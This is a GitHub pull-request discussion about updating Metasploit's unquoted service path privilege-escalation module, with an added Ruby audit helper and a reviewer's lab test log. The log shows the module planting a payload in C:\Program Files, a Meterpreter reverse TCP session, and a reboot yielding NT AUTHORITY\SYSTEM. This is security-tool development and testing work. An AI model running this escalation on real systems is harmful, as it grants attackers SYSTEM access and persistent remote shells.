
Updates to Trusted Service Path (now Unquoted Service path) #13193

Merged
merged 5 commits into from
Apr 16, 2020

Conversation


@h00die h00die commented Apr 4, 2020

Fixes #11319

@sinn3r a long while ago wrote this local exploit. Seems to be quite popular on EDB (110+ vuln applications). When it was originally written, most likely against XP, permissions on the filesystem were much more relaxed, and writing to C:\ was easy. Win7+ changed that, so the logic now is reversed where we try the longest path FIRST and work our way to the shortest, and keep trying w/o giving up.

Changes:

  1. Try multiple paths instead of giving up after the first one
  2. Attempt longest to shortest, instead of shortest to longest
  3. leave payload on disk since many times we're unable to restart the service (but a system reboot or service restart will exploit the box)
  4. Rename to the current naming methodology, which seems to be more popular
  5. add docs

@smcintyre-r7 smcintyre-r7 self-assigned this Apr 10, 2020

@smcintyre-r7 smcintyre-r7 left a comment

I don't know about that check method... It's only enumerating services and looking for a vulnerable one which seems like half the puzzle. Based on your exploitation logic, you also need a writable path. I'd like to see the check method updated to either:

  • Not return CheckCode::Vulnerable unless we're certain that's accurate
  • Find a writable path. This could be a bit trickier due to Windows permissions, groups and what not. A simple check could look for global write, but that would miss permission based checks that might include a group the session is currently running in the context of.

Thoughts?


h00die commented Apr 10, 2020

On Linux there's a writable? post function. Maybe it's time to make an equivalent...


h00die commented Apr 10, 2020

Updates:

  1. There's now a Windows version of writable?. Since permissions are wonky, I decided to just write a file, print it, and delete it.
  2. sinn3r had a 'quick' variable that wasn't really used. He only used the first service. I've now added that as an option so it exploits the first service in the first writable directory. Otherwise, it will try them all!!!
  3. updated check codes since we now have writable? so that it is testing writability too.

@smcintyre-r7 I think this is ready for review again
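An added example, written for this thread and not part of the Metasploit module or the PR: an audit helper that covers the two points discussed above, the longest-to-shortest ordering of the candidate file names from the first post and the write-probe version of writable? from this comment (which is also what the review asked the check to verify). The "everything up to the first .exe is the executable" split is an assumption of the example, and the service table is constructed sample data, not output from any host. It reports, for each unquoted path with spaces, the directories whose ACLs need auditing and the quoted ImagePath that fixes the service.

```ruby
# Added example, not the Metasploit module's own code: audit helper for
# unquoted service paths. candidate_paths orders the file names Windows
# would try for an unquoted, space-containing ImagePath from longest to
# shortest; writable_dir? probes a directory the way the PR's writable?
# does (write a marker file, read it back, delete it).
require 'securerandom'
require 'tmpdir'

# Heuristic (assumption of this example): the executable is everything up
# to the first ".exe"; anything after that is treated as service arguments.
def executable_part(image_path)
  p = image_path.strip
  m = p.match(/\A.*?\.exe\b/i)
  m ? m[0] : p
end

# A path needs quoting when it is not already quoted and the executable
# portion (not the arguments) contains a space.
def unquoted_with_spaces?(image_path)
  p = image_path.strip
  return false if p.start_with?('"')
  executable_part(p).include?(' ')
end

# Every prefix of the executable path that ends just before a space, with
# ".exe" appended, is a name Windows would try before the real binary.
# Returned longest first, the order the PR now uses.
def candidate_paths(exe)
  space_offsets = exe.each_char.each_with_index.select { |ch, _| ch == ' ' }.map(&:last)
  space_offsets.map { |i| "#{exe[0...i]}.exe" }.reverse
end

# Parent directory of a candidate: its ACL decides whether a low-privilege
# user could plant that file, so it is what an auditor must inspect.
def parent_dir(path)
  dir = path.rpartition('\\').first
  dir.end_with?(':') ? "#{dir}\\" : dir
end

# Report for one service: vulnerable or not, candidate names (longest
# first), directories to audit, and the remediated (quoted) ImagePath.
def audit_service_path(name, image_path)
  return { name: name, vulnerable: false } unless unquoted_with_spaces?(image_path)

  exe = executable_part(image_path)
  args = image_path.strip[exe.length..-1].to_s
  candidates = candidate_paths(exe)
  {
    name: name,
    vulnerable: true,
    candidates: candidates,
    audit_dirs: candidates.map { |c| parent_dir(c) }.uniq,
    fixed_image_path: "\"#{exe}\"#{args}"
  }
end

# Probe writability as the PR describes: write, read back, delete.
# Any permission or I/O error means "not writable"; the marker is always removed.
def writable_dir?(dir)
  probe = File.join(dir, "usp-probe-#{SecureRandom.hex(8)}.tmp")
  File.write(probe, 'probe')
  File.read(probe) == 'probe'
rescue SystemCallError, IOError
  false
ensure
  File.delete(probe) if probe && File.exist?(probe)
end

# Constructed sample ImagePath values, not taken from any real host.
SAMPLE_SERVICES = {
  'GoodSvc'               => '"C:\Program Files\Vendor Tool\svc.exe" -k net',
  'NoSpaces'              => 'C:\Windows\system32\svchost.exe -k netsvcs',
  'SomeVulnerableService' => 'C:\Program Files\A Subfolder\B.exe'
}.freeze

# Only the services that actually need remediation.
def audit_services(services = SAMPLE_SERVICES)
  services.map { |n, p| audit_service_path(n, p) }.select { |r| r[:vulnerable] }
end

if __FILE__ == $0
  audit_services.each do |r|
    puts "#{r[:name]}: audit ACLs on #{r[:audit_dirs].join(', ')}; set ImagePath to #{r[:fixed_image_path]}"
  end
  Dir.mktmpdir { |d| puts "write probe of #{d}: #{writable_dir?(d)}" }
end
```

For the constructed vulnerable entry the report lists C:\Program Files\A.exe before C:\Program.exe, so C:\Program Files and C:\ are the directories whose permissions matter; on a Windows host the same probe run against each of them is what separates "unquoted path exists" from "actually exploitable", which is the distinction the review asked the check method to make.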


h00die commented Apr 11, 2020

Also resolved a bug in the check command. Tested on set quick false, which works as well, just much slower.


@smcintyre-r7 smcintyre-r7 left a comment

Tested successfully on Windows 10 x64 build 10586. I followed the steps from the Medium article to create a vulnerable environment. I'll have this landed shortly, thanks @h00die this is a stellar improvement!

msf5 payload(windows/meterpreter/reverse_tcp) > sessions -i -1
[*] Starting interaction with 5...

meterpreter > getuid
Server username: DESKTOP-R9TM84E\sumit
meterpreter > sysinfo
Computer        : DESKTOP-R9TM84E
OS              : Windows 10 (10.0 Build 10586).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: The environment is incorrect. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
meterpreter > background 
[*] Backgrounding session 5...
msf5 payload(windows/meterpreter/reverse_tcp) > previous 
msf5 exploit(windows/local/unquoted_service_path) > show options 

Module options (exploit/windows/local/unquoted_service_path):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   QUICK    true             no        Stop at first vulnerable service found
   SESSION  -1               yes       The session to run this module on.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.159.128  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows


msf5 exploit(windows/local/unquoted_service_path) > check
[+] The target is vulnerable.
msf5 exploit(windows/local/unquoted_service_path) > exploit

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Finding a vulnerable service...
[*] Attempting exploitation of Some Vulnerable Service
[*] Placing C:\Program Files\A Subfolder\B.exe for Some Vulnerable Service
[*] Attempting to write 15872 bytes to C:\Program Files\A Subfolder\B.exe...
[+] Manual cleanup of C:\Program Files\A Subfolder\B.exe is required due to a potential reboot for exploitation.
[+] Successfully wrote payload
[*] Launching service Some Vulnerable Service...
[*] Manual cleanup of the payload file is required. Some Vulnerable Service will fail to start as long as the payload remains on disk.
[-] Unable to restart service.  System reboot or an admin restarting the service is required.  Payload left on disk!!!
[*] Exploit completed, but no session was created.
msf5 exploit(windows/local/unquoted_service_path) > previous 
msf5 payload(windows/meterpreter/reverse_tcp) > to_handler 
[*] Payload Handler Started as Job 7
msf5 payload(windows/meterpreter/reverse_tcp) > 
[*] Started reverse TCP handler on 192.168.159.128:4444 

msf5 payload(windows/meterpreter/reverse_tcp) > sessions -i -1
[*] Starting interaction with 5...

meterpreter > shell
Process 1752 created.
Channel 6 created.
Microsoft Windows [Version 10.0.10586]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Users\sumit\Desktop>shutdown /r /t 0

[*] 192.168.159.165 - Meterpreter session 5 closed.  Reason: Died


Terminate channel 6? [y/N]  y
[-] Error running command shell: Rex::TimeoutError Operation timed out.
msf5 payload(windows/meterpreter/reverse_tcp) > 
[*] Sending stage (180291 bytes) to 192.168.159.165
[*] Meterpreter session 6 opened (192.168.159.128:4444 -> 192.168.159.165:49670) at 2020-04-16 11:26:16 -0400

msf5 payload(windows/meterpreter/reverse_tcp) > sessions -i -1
[*] Starting interaction with 6...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DESKTOP-R9TM84E
OS              : Windows 10 (10.0 Build 10586).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 0
Meterpreter     : x86/windows
meterpreter > 

@smcintyre-r7 smcintyre-r7 merged commit 62a000f into rapid7:master Apr 16, 2020
@h00die h00die deleted the usp branch April 16, 2020 17:44
@tperry-r7 tperry-r7 added the rn-enhancement release notes enhancement label Apr 29, 2020

tperry-r7 commented Apr 29, 2020

Release Notes

The module modules/exploits/windows/local/unquoted_service_path was updated to allow you to try multiple paths, attempt longest to shortest, and leave the payload on the disk.

Successfully merging this pull request may close these issues.

Local Exploit trusted_service_path is not traversing the sub-folders